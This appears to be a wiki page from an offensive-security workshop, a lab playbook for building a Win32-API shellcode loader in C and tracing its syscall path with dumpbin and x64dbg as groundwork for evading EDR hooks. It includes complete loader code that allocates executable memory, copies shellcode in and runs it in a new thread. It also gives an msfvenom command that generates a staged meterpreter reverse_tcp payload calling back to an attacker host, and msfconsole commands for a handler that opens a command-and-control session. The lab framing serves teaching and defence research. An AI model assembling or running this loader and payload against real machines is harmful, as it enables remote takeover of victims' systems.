08: Chapter 4 | LAB Exercise Playbook

VirtualAllocEx edited this page Aug 7, 2023 · 52 revisions

Exercise: Win32-API Loader

In this exercise we will create our first shellcode loader based on Win32 APIs (high level APIs). This loader will be our reference for further development into a direct syscall and indirect syscall loader.

Prinicipal_Win32-apis

The code template for this tutorial can be found here.

Exercise tasks:

Build Win32-API Loader

Task Nr. Task Description
1 Download the Win32-API Loader POC for this chapter.
2 The code in the POC is only partially complete. Following the instructions in this playbook, your task is to complete it by placing the provided code for the four Windows APIs in the correct order.
3 Create the meterpreter shellcode, paste it into the loader and compile the loader.
4 Create and run a staged x64 meterpreter listener using msfconsole.
5 Run your compiled .exe and check that a stable command and control channel opens.

Analyse Win32-API Loader

Task Nr. Task Description
6 Use the Visual Studio dumpbin tool to analyse the Win32-API Loader. Are any Win32 APIs being imported from kernel32.dll? Is the result what you expected?
7 Use x64dbg to debug or analyse the Win32-API Loader.
  • Check which Win32 APIs and native APIs are being imported. If they are being imported, from which module or memory location are they being imported? Is the result what you expected?
  • Check from which module or memory location the syscalls for the four APIs used are being executed. Is the result what you expected?
  • etc.

Visual Studio

The Win32 API loader is technically simple, which in my opinion makes it a good starting point for rewriting it step by step into a low-level loader that uses direct or indirect system calls. The code for the Win32 API loader works as follows.

Thread Function

First, we define the thread function ExecuteShellcode, which is needed later to execute our shellcode. A thread function is the function that runs when a new thread starts: in Windows, CreateThread expects a pointer to such a function and uses it as the start address of the new thread. In our case, ExecuteShellcode receives the address of the copied shellcode as its parameter and calls it, so the shellcode runs in the new thread.

// Define the thread function for executing shellcode
// This function will be executed in a separate thread created later in the main function
DWORD WINAPI ExecuteShellcode(LPVOID lpParam) {
    // Create a function pointer called 'shellcode' and initialize it with the address of the shellcode
    void (*shellcode)() = (void (*)())lpParam;

    // Call the shellcode function using the function pointer
    shellcode();

    // Return 0 as the thread exit code
    return 0;
}
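The cast inside ExecuteShellcode can be tried out safely with an ordinary function instead of shellcode. The following is a minimal, portable sketch under that assumption; the names g_called, mark_called and run_param_as_function are hypothetical and not part of the POC. It passes the address of a harmless function through a generic pointer parameter and calls it, the same way the thread function treats lpParam.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for the payload: a harmless function that records it ran. */
int g_called = 0;
void mark_called(void) { g_called += 1; }

/* Mirrors the body of ExecuteShellcode: treat the generic pointer parameter
   as the address of a function taking no arguments, then call it.
   Note: converting between void* and function pointers is not guaranteed by
   ISO C, but it is supported on Windows and POSIX platforms. */
unsigned long run_param_as_function(void *param) {
    assert(param != NULL);               /* refuse to call through a null pointer */
    void (*fn)(void) = (void (*)(void))param;
    fn();
    return 0;                            /* plays the role of the thread exit code */
}
```

Calling run_param_as_function((void *)mark_called) increments g_called once and returns 0, which corresponds to the thread exit code in the loader.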

Shellcode

Within the main function, the variable code is defined, which is responsible for storing the meterpreter shellcode. The content of code is stored in the .text (code) section of the PE structure or, if the shellcode is larger than 255 bytes, the shellcode is stored in the .rdata section.

// Insert the Meterpreter shellcode as an array of unsigned chars (replace the placeholder with actual shellcode)
    unsigned char code[] = "\xfc\x48\x83...";
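One detail is worth knowing because the loader later passes sizeof(code) to the APIs: an array initialised from a string literal also contains the terminating null byte. The small sketch below uses made-up placeholder bytes rather than real shellcode, and the names demo_bytes, demo_size_with_terminator and demo_payload_length are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Placeholder data only: three arbitrary bytes written as a string literal. */
unsigned char demo_bytes[] = "\x01\x02\x03";

/* sizeof counts the three bytes plus the implicit terminating '\0'. */
size_t demo_size_with_terminator(void) {
    return sizeof(demo_bytes);
}

/* Length of the data itself, without the terminator. */
size_t demo_payload_length(void) {
    size_t n = sizeof(demo_bytes) - 1;
    assert(demo_bytes[n] == 0);          /* the extra byte is the terminator */
    return n;
}
```

Here demo_size_with_terminator() yields 4 and demo_payload_length() yields 3. Copying the one extra zero byte does no harm, but it explains why sizeof(code) is one larger than the number of bytes written in the literal.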

VirtualAlloc

The VirtualAlloc Win32 API is used to reserve, commit, or change the state of a region of pages in the virtual address space of the calling process. This code block declares the void pointer exec, which stores the base address of the allocated memory region returned by VirtualAlloc. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.

// Allocate Virtual Memory with PAGE_EXECUTE_READWRITE permissions to store the shellcode
    // 'exec' will hold the base address of the allocated memory region
    void* exec = VirtualAlloc(0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);

WriteProcessMemory

The WriteProcessMemory function provided by the Windows API writes data to an area of memory in a specified process. The entire area to be written must be accessible (in our case it was previously allocated with VirtualAlloc); attempts to write to inaccessible memory result in an error. We use WriteProcessMemory to copy the meterpreter shellcode into the committed memory region of our own process. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.

// Copy the shellcode into the allocated memory region using WriteProcessMemory
    SIZE_T bytesWritten;
    WriteProcessMemory(GetCurrentProcess(), exec, code, sizeof(code), &bytesWritten);

CreateThread

The Win32 CreateThread API allows you to create a new thread of execution within your process. In our case, we are using this API to run our shellcode in a new thread rather than in the main thread. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.

    // Create a new thread to execute the shellcode
    // Pass the address of the ExecuteShellcode function as the thread function, and 'exec' as its parameter
    // The returned handle of the created thread is stored in hThread
    HANDLE hThread = CreateThread(NULL, 0, ExecuteShellcode, exec, 0, NULL); 

WaitForSingleObject

By using the Windows API WaitForSingleObject, we ensure that the shellcode thread completes its execution before the main thread exits. Without WaitForSingleObject, the shellcode thread would still be started correctly, but when the main thread returns from main(), the process itself may exit, killing all threads that are still running. This includes the shellcode thread, which would be abruptly terminated even if it had not finished executing. This is why WaitForSingleObject is important and necessary. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.

// Wait for the shellcode execution thread to finish executing
    // This ensures the main thread doesn't exit before the shellcode has finished running
    WaitForSingleObject(hThread, INFINITE);    

Task

Your task now is to complete the Win32 API loader POC by using the following code for the required Windows APIs. Remember that the correct order is required: allocate memory, copy the shellcode into memory, execute it in a new thread, and keep the main thread waiting until the new thread has finished.

Code
// Create a new thread to execute the shellcode
    // Pass the address of the ExecuteShellcode function as the thread function, and 'exec' as its parameter
    // The returned handle of the created thread is stored in hThread
    HANDLE hThread = CreateThread(NULL, 0, ExecuteShellcode, exec, 0, NULL);

    // Copy the shellcode into the allocated memory region using WriteProcessMemory
    SIZE_T bytesWritten;
    WriteProcessMemory(GetCurrentProcess(), exec, code, sizeof(code), &bytesWritten);

    // Allocate Virtual Memory with PAGE_EXECUTE_READWRITE permissions to store the shellcode
    // 'exec' will hold the base address of the allocated memory region
    void* exec = VirtualAlloc(0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
   
    // Wait for the shellcode execution thread to finish executing
    // This ensures the main thread doesn't exit before the shellcode has finished running
    WaitForSingleObject(hThread, INFINITE);

Meterpreter Shellcode

Task

In this step, we will create our meterpreter shellcode for the Win32-API Loader with msfvenom in Kali Linux. To do this, we will use the following command and create x64 staged meterpreter shellcode.

kali>

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IPv4_Redirector_or_IPv4_Kali LPORT=80 -f c > /tmp/shellcode.txt

image

The shellcode can then be copied into the Win32-API Loader POC by replacing the placeholder in the unsigned char code[] array, and the POC can be compiled as an x64 release.

image

MSF-Listener

Task

Before we test the functionality of our Win32-API Loader, we need to create a listener within msfconsole.

kali>

msfconsole

msf>

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost IPv4_Redirector_or_IPv4_Kali
set lport 80 
set exitonsession false
run

image

Once the listener has been successfully started, you can run your compiled Win32-API Loader. If all goes well, you should see an incoming command and control session.

image

Loader Analysis: dumpbin

Task

The Visual Studio tool dumpbin can be used to check which Windows APIs are imported via kernel32.dll. The following command can be used to check the imports. Which results do you expect?

cmd>

cd C:\Program Files (x86)\Microsoft Visual Studio\2019\Community
dumpbin /imports Win32-API.exe

Results

In the case of the Win32-API Loader, you should see that the Windows APIs VirtualAlloc, WriteProcessMemory, CreateThread and WaitForSingleObject are correctly imported into the Win32-API Loader from kernel32.dll.

image

Loader Analysis: x64dbg

Task

The first step is to run your Win32-API Loader and check that the .exe is running and that a stable meterpreter C2 channel is open. Then we open x64dbg and attach to the running process. Note that if you open the Win32-API Loader directly in x64dbg instead, you need to run the assembly first.

image

image

Task

Next, we want to check which APIs (Win32 or native) are being imported, whether they are the ones we expect, and from which module or memory location they are imported. Remember that no direct syscalls or similar are used in the Win32-API Loader. What results do you expect?

Results

Checking the imported symbols in our Win32-API Loader, we should see that the Win32 APIs VirtualAlloc, WriteProcessMemory, CreateThread and WaitForSingleObject are imported from kernel32.dll. So the result is the same as with dumpbin and seems to be valid.

09

Task

We also want to check from which module or memory location the syscall stub of the native functions used is implemented, and also check from which module or memory location the syscall statement and return statement are executed.

Results

We use the "Follow imported address" function in the Symbols tab by right-clicking on one of the four Win32 APIs used, e.g. VirtualAlloc, and we can see that we jump to the location of kernel32.dll.

10

In the next step we use the "Follow in Disassembler" function to follow the memory address that jumps into the memory of kernelbase.dll.

11

12

Then we use the "Follow in Disassembler" function again and follow the address that calls the native function NtAllocateVirtualMemory (or ZwAllocateVirtualMemory) from a memory location in ntdll.dll.

13

14

As expected, we take the normal path via malware.exe -> kernel32.dll -> kernelbase.dll -> ntdll.dll -> syscall. The following illustration shows that the syscall instruction and the return instruction are executed from a memory region in ntdll.dll, as expected.

15

Task

Finally, we want to identify the meterpreter shellcode in the .text section of the shellcode loader. To do this, have a look at the disassembled code of Win32API-Loader.exe.

Results

By using the "Follow in Disassembler" on the loader module, we can jump to the disassembled code from the shellcode loader. In my case, at the very top we can identify the meterpreter shellcode. As long as your shellcode size is less than or equal to 255 bytes, you will find the shellcode in the .text section of the shellcode loader. If the shellcode size is greater than 255 bytes, the shellcode will be stored in the .rdata section of the loader.

image

Summary: Win32-API Loader

  • Syscall execution via normal transition from Win32-API Loader.exe -> kernel32.dll -> kernelbase.dll -> ntdll.dll -> syscall
  • Win32-API Loader imports Windows APIs from kernel32.dll...
  • ...then accesses or imports the native functions from ntdll.dll...
  • ...and finally executes the code of the corresponding native function, including the syscall instruction.
  • If an EDR uses user mode hooking in kernel32.dll or ntdll.dll, the execution flow of malware.exe is redirected to the EDR's hooking.dll.